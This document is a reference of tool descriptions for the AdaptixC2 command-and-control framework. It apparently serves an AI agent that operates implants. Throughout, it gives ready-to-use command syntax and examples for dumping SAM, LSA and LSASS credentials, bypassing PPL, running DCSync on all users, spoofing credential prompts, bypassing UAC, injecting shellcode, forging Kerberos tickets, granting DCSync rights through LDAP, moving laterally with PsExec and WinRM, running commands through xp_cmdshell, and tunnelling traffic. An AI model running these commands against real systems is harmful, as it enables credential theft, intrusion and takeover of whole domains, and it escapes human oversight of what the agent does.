List all active agents connected to the AdaptixC2 teamserver. Returns: OS, hostname, username, IP, process, sleep interval, elevation status.

Get detailed information about a specific agent by ID. Accepts both internal a_id and GUI-visible a_crc (8-char hex).

Remove an agent session from the teamserver. This removes the C2 record — it does NOT kill the implant process.

Set a text tag on one or more agents for organisation. agent_ids: comma-separated list of agent IDs.

List all active listeners on the teamserver.

Show execution history for a specific agent. Returns recent commands, their timestamps, statuses and outputs. Use this to avoid repeating commands if results are recent and valid.

Get the current user identity on the agent. Runs native 'getuid' beacon command. Returns: username and privilege level of the current token.

List all running processes on the agent host. Runs 'ps list' beacon command. Returns: process list with PID, name, user, and session info.

Kill a running process by PID. Args: pid (INT, required) — process ID to terminate.

Run a program on the agent host via 'ps run'. Args: args: Full path + arguments, e.g. 'C:\Windows\System32\cmd.exe /c whoami' suspend: Start process suspended (-s) with_output: Capture output (-o) impersonate: Use token impersonation (-i)

List all credentials harvested across all agents.

List all known targets/hosts in the teamserver database.

Execute a command via cmd.exe (Windows) or /bin/sh (Linux). Args: command (required) — e.g. 'whoami /all' or 'ipconfig /all'

Execute a PowerShell expression (Windows only). Args: command (required) — e.g. 'Get-LocalUser | Select Name,Enabled'

Execute a raw command string on an agent (AxScript engine). The cmdline is parsed exactly as if typed in the agent console. Use for advanced commands not covered by other tools.

Change the agent's sleep interval and jitter. Args: sleep_seconds (INT), jitter_percent (INT, default 0)

List long-running background jobs on an agent.

Kill a background job on an agent by task ID. Args: task_id (STRING) — from jobs_list output.

List contents of a directory or details of a file on the agent. Usage: ls [path] Arguments: path : STRING (optional, default '.') — Directory or file path to list. Example: ls C:\Users

Print the current working directory of the agent process. Usage: pwd Returns the absolute path of the agent's current directory.

Read first 2048 bytes of a file on the agent. Usage: cat Arguments: path : STRING (required) — Absolute path to the file to read. Example: cat C:\Windows\System32\drivers\etc\hosts

Change the current working directory of the agent process. Usage: cd Arguments: path : STRING (required) — Target directory path. Example: cd C:\Windows\System32

Copy a file on the agent. Usage: cp Arguments: src : STRING (required) — Source file path. dst : STRING (required) — Destination file path. Example: cp C:\Temp\file.txt C:\Temp\backup.txt

Move (rename) a file on the agent. Usage: mv Arguments: src : STRING (required) — Source file path. dst : STRING (required) — Destination file path. Example: mv C:\Temp\old.txt C:\Temp\new.txt

Create a directory on the agent. Usage: mkdir Arguments: path : STRING (required) — Directory path to create. Example: mkdir C:\Temp\newdir

Remove a file or folder on the agent. Usage: rm Arguments: path : STRING (required) — Path to file or directory to remove. Example: rm C:\Temp\file.txt

Task the agent to download a file to the teamserver. Usage: download Arguments: remote_path : STRING (required) — Full path to the file on the agent to download. Example: download C:\Temp\secrets.txt Use list_downloads to see completed downloads and get_downloaded_file to retrieve content.

List mounted drives on the agent system. Usage: disks Returns: list of mounted drives (e.g. C:\, D:\).

List all files that have been downloaded from agents to the teamserver.

Retrieve the content of a file previously downloaded from an agent. Returns the file content as base64-encoded text. Use list_downloads to get file IDs.

List all active tunnels (SOCKS proxies, port forwards) on the teamserver.

Start a SOCKS5 proxy tunnel through an agent. Binds a SOCKS5 listener on the teamserver host. Returns the tunnel ID on success.

Start a SOCKS4 proxy tunnel through an agent. Binds a SOCKS4 listener on the teamserver host. Returns the tunnel ID on success.

Start a local port forward through an agent: lhost:lport (local on teamserver) → thost:tport (target via agent). Returns the tunnel ID.

Start a reverse port forward through an agent: agent listens on port, forwards to thost:tport from the teamserver. Returns the tunnel ID.

Stop an active tunnel by its ID. Use list_tunnels to find tunnel IDs.

Log a finding (credential, secret, or important file) to the local session notes. Arguments: agent_id : STRING — ID of the agent where the finding was made. category : STRING — Type of finding (e.g., 'Credential', 'Configuration', 'Loot'). content : STRING — The actual data found (password, hash, file content). context : STRING — Description of where and how it was found.

Save a short writeup or explanation of an action (e.g., how you elevated privileges). Use this to record successful techniques for later review.

Read all saved notes and findings for this session.

AD-BOF: Active Directory exploitation commands.

adwssearch [-a attributes] [--dc dc] [--dn dn] Executes ADWS query. Example: adwssearch (objectClass=*) -a *,ntsecuritydescriptor --dc DC1

badtakeover BOF for account takeover via BadSuccessor (dMSA). Example: badtakeover "OU=TestOU,DC=domain,DC=dom" attacker S-1-5-21-...-1104 "CN=admin,CN=Users,DC=domain,DC=dom" domain.dom

dcsync single [-ou ou_path] [-dc dc_address] [--ldaps] [--only-nt] DCSync a single user. Example: dcsync single jane.doe -dc dc01.corp.local

dcsync all [-ou ou_path] [-dc dc_address] [--ldaps] [--only-nt] [--only-users] DCSync all domain users. Example: dcsync all -dc dc01.corp.local --only-users

ldapsearch [-a attributes] [-c count] [-s scope] [--dc dc] [--dn dn] [--ldaps] Raw LDAP query. Example: ldapsearch (objectClass=*) -a *,ntsecuritydescriptor --dc DC1

ldapq computers Get list of computers from LDAP (auto-populates Targets tab). Example: ldapq computers

readlaps [-dc dc] [-dn dn] {-target name | -target-dn dn} Read LAPS password. Example: readlaps -dc dc01.domain.local -target WINCLIENT

webdav enable Enable WebDAV client service (no elevated privileges needed).

webdav status Check if WebDAV is running on remote hosts. Example: webdav status 192.168.0.1,192.168.0.2

ADCS-BOF: Active Directory Certificate Services attacks.

certi auth --cert [--password pass] [--dc dc] [--target user] Authenticate with certificate (PKINIT + UnPAC-the-hash). Example: certi auth --cert MIIMcAI...

certi enum [--ca ca] [--template tmpl] [--dc dc] Enumerate CAs and certificate templates. Example: certi enum

certi request --ca --template [--subject CN=...] [--altname CN=...] [--alturl ...] Request an enrollment certificate. Example: certi request --ca cert.example.org\example-CA --template vulnTemplate

certi request_on_behalf Request cert on behalf of another user (ESC3). Example: certi request_on_behalf ca\CA-Name vulnTemplate Administrator /tmp/ea.pfx

certi shadow --target [--dc dc] [--device-id id] Shadow Credentials attack — write KeyCredentialLink and get certificate. Example: certi shadow --target Administrator

Creds-BOF: Windows credential extraction.

askcreds [-p prompt] [-n note] [-t wait_time_secs] [--async] Prompt user for credentials via fake dialog. Example: askcreds -p "Windows Update"

get-netntlm [--no-ess] Retrieve NetNTLM hash (Internal Monologue). Example: get-netntlm --no-ess

hashdump Dump SAM hashes (requires admin). Auto-saves to credentials tab.

lsadump_secrets Dump LSA secrets from SECURITY hive (requires SYSTEM). Auto-saves service credentials.

lsadump_sam Dump SAM hashes via lsadump::sam (requires admin).

lsadump_cache Dump cached domain credentials DCC2/MSCacheV2 (requires SYSTEM).

nanodump [--write path] [--valid] [--ppl-dump] [--kdump] ... Dump LSASS via syscalls. Example: nanodump --write C:\Windows\Temp\lsass.dmp

nanodump_ppl_dump Bypass PPL and dump LSASS (PPL-dump variant).

nanodump_ppl_medic Bypass PPL and dump LSASS (PPL-medic variant).

nanodump_ssp Load a Security Support Provider (SSP) into LSASS.

cookie-monster [--edge] [--chrome] [--firefox] [-t target_user] Locate and copy browser cookie files.

underlaycopy <MFT|Metadata> [-w destination] [--download] Copy file using low-level NTFS (MFT/Metadata mode). Example: underlaycopy MFT C:\Windows\System32\notepad.exe -w C:\temp\copy.exe

Elevation-BOF: Local privilege escalation to SYSTEM.

getsystem token Elevate to SYSTEM via TrustedInstaller impersonation. Example: getsystem token

uacbybass sspi UAC bypass via SSPI Datagram Contexts. Example: uacbybass sspi c:\windows\tasks\agent.exe

uacbybass regshellcmd UAC bypass via ms-settings Shell registry key. Example: uacbybass regshellcmd c:\windows\tasks\agent.exe

potato-dcom {--token | --run } DCOM Potato — SYSTEM via SeImpersonate. Example: potato-dcom --token Example: potato-dcom --run C:\Windows\System32\cmd.exe /c whoami /all

potato-print {--token | --run } PrintSpoofer — SYSTEM via Print Spooler Named Pipe. Example: potato-print --token

Execution-BOF: In-process payload execution.

execute-assembly [params] [--async] Execute a .NET assembly in-process (no fork-and-run). Example: execute-assembly /opt/Seatbelt.exe -group=user

noconsolation [args] Run an unmanaged EXE/DLL inside agent memory without a console. Example: noconsolation /tmp/mimikatz.exe "sekurlsa::logonpasswords"

Injection-BOF: Shellcode injection into target processes.

inject-cfg Inject via CFG hook (combase.dll __guard_check_icall_fptr). Example: inject-cfg 808 /tmp/shellcode.bin

inject-sec Inject via section mapping. Example: inject-sec 808 /tmp/shellcode.bin

inject-poolparty Inject via Pool Party techniques (1-8). 1=StartRoutine, 2=TP_WORK, 7=TP_DIRECT, etc. Example: inject-poolparty 7 808 /tmp/shellcode.bin

inject-32to64 Inject x64 shellcode from WOW64 (32-bit) agent into native x64 process via RtlCreateUserThread. Requires 32-bit agent. Example: inject-32to64 808 /tmp/shellcode.bin

Kerbeus-BOF: Kerberos ticket operations and attacks.

kerbeus asreproasting /user: [/domain:] [/dc:] [/outfile:] AS-REP roasting. Example: kerbeus asreproasting /user:pre_user

kerbeus asktgt /user: /password: [/enctype:aes256] [/ptt] [/opsec] Request a TGT. Example: kerbeus asktgt /user:Admin /password:QWErty /enctype:aes256 /ptt

kerbeus asktgs /user: /service: [/ticket:<.kirbi>] [/enctype:aes256] [/ptt] Request a TGS. Example: kerbeus asktgs /user:Admin /service:cifs/dc01.corp.local

kerbeus changepw /ticket: /new: [/dc:] Reset a user password from a valid TGT.

kerbeus dump [/luid:] [/service:] [/client:] Dump Kerberos tickets from memory.

kerbeus hash /password: [/user:] [/domain:] [/enctype:rc4|aes128|aes256] Calculate Kerberos hashes.

kerbeus kerberoasting [/spn:] [/dc:] [/outfile:] Kerberoasting. Example: kerbeus kerberoasting

kerbeus klist [/luid:] List Kerberos tickets in memory.

kerbeus ptt /ticket: Submit (Pass-the-Ticket) a TGT. Example: kerbeus ptt /ticket:doIFg...

kerbeus describe /ticket: Parse and describe a ticket.

kerbeus purge [/luid:] Purge Kerberos tickets from memory.

kerbeus renew /ticket: [/dc:] [/ptt] Renew a TGT.

kerbeus s4u /user: /rc4: /impersonateuser: /msdsspn: [/ptt] S4U2Self/S4U2Proxy constrained delegation abuse.

kerbeus cross_s4u /user: /ticket: /impersonateuser: /msdsspn: [/ptt] Cross-domain S4U constrained delegation abuse.

kerbeus tgtdeleg /spn: Retrieve usable TGT without elevation via GSS-API. Example: kerbeus tgtdeleg /spn:host/dc01.corp.local

kerbeus triage [/luid:] List tickets in table format.

LDAP-BOF: Full LDAP read/write/delete operations against Active Directory.

ENUMERATION (Read): ldap get-acl — Get ACL/security descriptor ldap get-attribute — Get specific attribute(s) ldap get-computers — List all domain computers ldap get-groups — List all domain groups ldap get-groupmembers — List members of a group ldap get-delegation — Get delegation config ldap get-domaininfo — Get domain info from rootDSE ldap get-maq — Get Machine Account Quota ldap get-object — Get all attributes of an object ldap get-rbcd — Get RBCD config ldap get-spn — Get SPNs ldap get-uac — Get UAC flags ldap get-users — List all domain users ldap get-usergroups — List groups a user is member of ldap get-writable — Find objects you have write access to

MODIFICATION (Write): ldap move-object — Move object to different OU ldap add-ace — Add ACE to DACL ldap add-attribute — Add value to attribute ldap add-computer [password] — Add computer to domain ldap add-delegation — Add delegation SPN ldap add-group [ou] — Add group ldap add-groupmember — Add member to group ldap add-ou — Add OU ldap add-rbcd — Add RBCD delegation ldap add-sidhistory — Add SID to sidHistory ldap add-spn — Add SPN ldap add-user [password] [ou] — Add user ldap add-uac — Add UAC flags ldap add-genericall — Add GenericAll ACE ldap add-genericwrite — Add GenericWrite ACE ldap add-dcsync — Add DCSync rights ldap add-asreproastable — Set DONT_REQ_PREAUTH ldap add-unconstrained — Enable unconstrained delegation ldap add-constrained — Set constrained delegation SPNs ldap set-attribute — Set/replace attribute ldap set-delegation — Set delegation SPNs ldap set-owner — Set object owner ldap set-spn — Set SPNs (replaces all) ldap set-password — Set/reset user password ldap set-uac — Set UAC flags (replaces all)

REMOVAL (Delete): ldap remove-ace — Remove ACE from DACL ldap remove-attribute [val] — Remove attribute/value ldap remove-delegation — Remove delegation SPN ldap remove-dcsync — Remove DCSync rights ldap remove-genericall — Remove GenericAll ACE ldap remove-genericwrite — Remove GenericWrite ACE ldap remove-groupmember — Remove group member ldap remove-object — Delete object from domain ldap remove-rbcd — Remove RBCD delegation ldap remove-spn — Remove SPN ldap remove-uac — Remove UAC flags

LateralMovement: Spawn sessions and execute commands on remote targets.

jump psexec [-b binary_name] [-s share] [-p svc_path] [-n svc_name] [-d svc_desc] Spawn session via PsExec (copy+create service). Example: jump psexec 192.168.0.1 /tmp/agent.exe -n UpdateService

jump scshell [-b binary_name] [-s share] [-p svc_path] [-n svc_name] Spawn session via SCShell (modify existing service). Example: jump scshell 192.168.0.1 /tmp/agent.exe -n defragsvc

invoke winrm [-t timeout_ms] [-b] [-u username] [-p password] Execute command via WinRM. Example: invoke winrm 192.168.0.1 "whoami /all" -u DOMAIN\admin -p P@ss

invoke scshell Execute command via SCShell (fileless). Example: invoke scshell 10.0.2.10 defragsvc "cmd.exe /c \share\agent.exe"

token make Create impersonated token (logon types: 2=Interactive, 3=Network, 8=NetworkCleartext, 9=NewCredentials). Example: token make admin P@ssword domain.local 9

token steal Steal access token from a process. Example: token steal 608

runas-user [-l logon_type] [-t timeout_ms] [-o] [-b] Run command as another user (RunasCs-like). Example: runas-user admin P@ss domain.local "cmd /c whoami" -l 9

runas-session Execute binary in another user's session via COM (IHxHelpPaneServer). Requires admin. Example: runas-session 3 C:\Windows\Temp\file.exe

MSSQL-BOF: Microsoft SQL Server enumeration and exploitation. Common optional flags for most commands: [-d database] [-l linkedserver] [-i impersonate_user] [-u user] [-p password]

mssql 1434udp — Get SQL Server info via UDP 1434 mssql adsi [-l linked] [-i impersonate] [server] [adsiserver] — Get ADSI creds from linked server mssql agentcmd — Execute system command via SQL Agent Jobs mssql agentstatus — Enumerate SQL Agent status and jobs mssql checkrpc — Check RPC status of linked servers mssql clr [-h hash] — Load and execute .NET assembly via CLR stored procedure mssql columns — Enumerate columns in a table mssql databases — Enumerate SQL databases mssql disableclr / enableclr — Disable/Enable CLR integration mssql disableole / enableole — Disable/Enable OLE Automation mssql disablerpc / enablerpc — Disable/Enable RPC on linked server mssql disablexp / enablexp — Disable/Enable xp_cmdshell mssql impersonate — Enumerate users that can be impersonated mssql info — Gather SQL Server information mssql links — Enumerate linked servers mssql olecmd — Execute command via OLE Automation mssql query — Execute custom SQL query. Example: mssql query 192.168.1.10 "SELECT @@version" mssql rows — Get row count in table mssql search — Search tables for a column name mssql smb \listener — Coerce NetNTLM auth via xp_dirtree mssql tables — Enumerate tables in database mssql users — Enumerate users with database access mssql whoami — Get logged in user, mapped user, and roles mssql xpcmd — Execute command via xp_cmdshell

PostEx-BOF: Post-exploitation utilities.

firewallrule add [-g groupname] [-d description] Add inbound/outbound firewall rule via COM (no admin needed). Example: firewallrule add 80 RuleName in -g Group1 -d TestRule

screenshot_bof [-n name] [-p pid] Alternative screenshot — does NOT use fork-and-run. Example: screenshot_bof -n screen1 -p 812

sauroneye -d -f -k Search directories for files with specific keywords (SauronEye BOF port). Example: sauroneye -d C:\Users -f .txt,.docx -k pass*,secret*

Process-BOF: Process enumeration and manipulation.

findobj module List all processes that have a specific module loaded. Example: findobj module clr.dll

findobj prochandle List all processes that have a handle to the specified process. Example: findobj prochandle lsass.exe

process conn List processes with established TCP/RDP connections with detailed info. Example: process conn

procfreeze freeze Freeze a target process using PPL bypass via WerFaultSecure.exe. Example: procfreeze freeze 1234

procfreeze unfreeze Unfreeze a previously frozen process. Example: procfreeze unfreeze

RelayInformer-BOF: Check relay attack mitigations on remote services.

relay-informer http Check HTTP(S) binding enforcement and channel binding. Example: relay-informer http https://test.dom.local

relay-informer ldap Check LDAP signing and LDAPS channel binding enforcement. Example: relay-informer ldap DC

relay-informer mssql Check MSSQL binding and channel binding enforcement. Example: relay-informer mssql DB

relay-informer smb Check SMB2 signing enforcement. Example: relay-informer smb DC01

SAL-BOF: Situational Awareness Local — Windows host reconnaissance.

arp — List ARP table cacls — List file/directory permissions. Example: cacls C:\test.txt dir [directory] [/s] — List directory contents (recursive with /s). Example: dir C:\Users /s env — List process environment variables ipconfig — List IPv4 addresses, hostname, DNS servers listdns — List DNS cache entries and resolve them netstat — Display active network connections nslookup [-s server] [-t type] — DNS query. Example: nslookup google.com -s 8.8.8.8 -t A routeprint — List IPv4 routes uptime — Show system boot time and uptime useridletime — Show user idle time in seconds/minutes/hours/days whoami — Run whoami /all (groups, privileges, SID)

privcheck all — Run ALL privilege escalation checks privcheck alwayselevated — Check AlwaysInstallElevated registry setting privcheck autologon — Check Winlogon autologon credentials privcheck credmanager — Enumerate Windows Credential Manager privcheck hijackablepath — Check PATH for writable directories privcheck modautorun — Check for modifiable autorun executables privcheck modsvc — Check for services with modifiable DACL privcheck pshistory — Check PowerShell PSReadLine history file privcheck tokenpriv — List token privileges and highlight vulnerable ones privcheck uacstatus — Check UAC status and integrity level privcheck unattendfiles — Check for leftover unattend.xml files privcheck unquotedsvc — Check for unquoted service paths privcheck vulndrivers — Check for known vulnerable drivers (loldrivers.io)

SAR-BOF: Situational Awareness Remote — Network discovery and enumeration.

smartscan [-p ports] Smart TCP port scan. Target can be IP, range, CIDR, or comma-separated. Port presets: fast, standart, full, or custom (e.g. 80,443,22-25,3389). Example: smartscan 192.168.1.0/24 -p standart

taskhound [-u username] [-p password] [-save dir] [-unsaved-creds] [-grab-blobs] Collect scheduled tasks from a remote system. Example: taskhound 192.168.1.100 -u domain\admin -p password

quser [host] Query user sessions on a remote machine. Example: quser MainDC

nbtscan [-v] [-q] [-e] [-l] [-s separator] [-t timeout_ms] [-no-targets] NetBIOS name scanner. Auto-populates Targets tab. Example: nbtscan 192.168.1.0/24 -v